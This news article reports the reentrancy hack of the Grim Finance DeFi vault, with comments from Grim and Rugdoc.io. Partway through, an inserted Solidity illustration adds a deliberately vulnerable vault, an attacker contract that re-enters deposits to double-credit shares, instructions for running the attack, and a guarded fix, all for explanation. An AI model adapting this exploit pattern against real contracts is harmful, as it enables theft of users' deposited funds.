By Jeff Benson
In brief
What, did you expect something named "Grim" to deliver good news?
Grim Finance, a DeFi protocol, was hacked for $30 million worth of tokens Saturday, it confirmed, in an "advanced attack." According to a tweet from the project, "The exploit was found in the vault contract so all of the vaults and deposited funds are currently at risk."
Grim calls itself a "compounding yield optimizer," meaning it promises to wring extra value from liquidity provider tokens that users receive from decentralized exchanges if they lock them up in a Grim vault. Grim touts in its protocol documentation, "Helping users reap more rewards, hassle-free."
The protocol runs on the Fantom Opera blockchain, an Ethereum-compatible smart contract platform whose contracts are written in Solidity. The hacker used a reentrancy attack: the vault makes an external call (a token transfer) before it has finished updating its own bookkeeping, and the contract on the other end of that call calls back into the vault while the first deposit is still in progress, so the vault credits the same deposit more than once.
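To make the mechanism concrete, here is an added Solidity illustration. It is not Grim Finance's code and not a reconstruction of the exploit used against it: a yield vault whose deposit measures incoming tokens by balance difference, a caller contract that re-enters mid-deposit so the same tokens are credited twice, and the same vault with the kind of reentrancy guard Rugdoc says should have been used. The contract names (VaultBase, VulnerableVault, GuardedVault, ReenteringToken) and the share formula are assumptions for the demo; the guard mirrors OpenZeppelin's ReentrancyGuard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration, not Grim Finance's contract. All contract names and the
// share accounting below are assumptions for the demo.

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Minimal mutex in the style of OpenZeppelin's ReentrancyGuard.
abstract contract ReentrancyGuard {
    uint256 private _status = 1;
    modifier nonReentrant() {
        require(_status == 1, "ReentrancyGuard: reentrant call");
        _status = 2;
        _;
        _status = 1;
    }
}

// Shares are minted in proportion to tokens that arrive, measured as
// balance-after minus balance-before around the transfer call.
abstract contract VaultBase {
    IERC20 public immutable want;           // the token this vault compounds
    uint256 public totalShares;
    mapping(address => uint256) public shares;

    constructor(IERC20 _want) { want = _want; }

    function _deposit(address token, uint256 amount) internal {
        uint256 before = want.balanceOf(address(this));
        // External call before bookkeeping is finished. If `token` is a
        // contract the caller wrote, its transferFrom can re-enter deposit().
        require(IERC20(token).transferFrom(msg.sender, address(this), amount), "transfer failed");
        uint256 received = want.balanceOf(address(this)) - before;
        uint256 minted = (totalShares == 0 || before == 0)
            ? received
            : received * totalShares / before;
        totalShares += minted;
        shares[msg.sender] += minted;
    }
}

// Vulnerable: unguarded, and it calls whatever token address it is handed.
contract VulnerableVault is VaultBase {
    constructor(IERC20 _want) VaultBase(_want) {}
    function deposit(address token, uint256 amount) external { _deposit(token, amount); }
}

// Hardened: nonReentrant rejects the nested call, and the transfer target is
// fixed to `want`, so the vault never calls into caller-supplied code.
contract GuardedVault is VaultBase, ReentrancyGuard {
    constructor(IERC20 _want) VaultBase(_want) {}
    function deposit(uint256 amount) external nonReentrant { _deposit(address(want), amount); }
}

// Attacker contract that poses as a token. Fund it with `amount` of `want`
// (the vault is assumed to already hold other users' deposits) before attack().
contract ReenteringToken {
    VulnerableVault public immutable vault;
    IERC20 public immutable want;
    bool private entered;

    constructor(VulnerableVault _vault, IERC20 _want) { vault = _vault; want = _want; }

    function attack(uint256 amount) external {
        want.approve(address(vault), amount);
        // Outer deposit: the vault snapshots its balance, then calls back here.
        vault.deposit(address(this), amount);
    }

    // Called by the vault mid-deposit. Re-enter once with the real token: the
    // inner deposit moves `amount` of `want` in and is credited, then the
    // outer deposit sees that same `amount` as newly received and credits it
    // again. Net effect: shares for at least 2 * amount, paid for once.
    function transferFrom(address, address, uint256 amount) external returns (bool) {
        if (!entered) {
            entered = true;
            vault.deposit(address(want), amount);
        }
        return true;
    }
}
```

Deploy VulnerableVault over an ERC-20 that already holds deposits, fund ReenteringToken, and call attack(): the attacker's share balance is credited at least twice for each token actually deposited. Against GuardedVault the nested deposit reverts with "reentrant call", and pinning the token address to `want` removes the attacker's way in even on a path where the guard is missing.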
"We have contacted and notified Circle (USDC), DAI, and AnySwap regarding the attacker address to potentially freeze any further fund transfers," Grim tweeted, but the attacker has already been busy laundering the ill-gotten funds through stablecoin transfers.
Rugdoc.io, a DeFi watchdog group of smart contract auditors and investors, says Grim Finance should have known better and used a reentrancy guard.
"Hopefully all projects can draw lessons from this incident that there is much knowledge most experienced solidity devs have at hand," it tweeted. "If you haven't acquired this yet, don't build multi-million dollar projects. Don't get audits from companies which everyone knows are useless."
Grim shared an audit of its finance token and vault contracts from Solidity Finance. According to Solidity Finance's report, "ReentrancyGuard is used in relevant locations to preent [sic] reentrancy attacks." A guard only covers the functions it is applied to, so any unguarded entry point that makes an external call before finishing its state updates remains exploitable whatever the audit found elsewhere.
As of Sunday afternoon, all deposits into Grim Finance vaults remain paused to prevent further theft.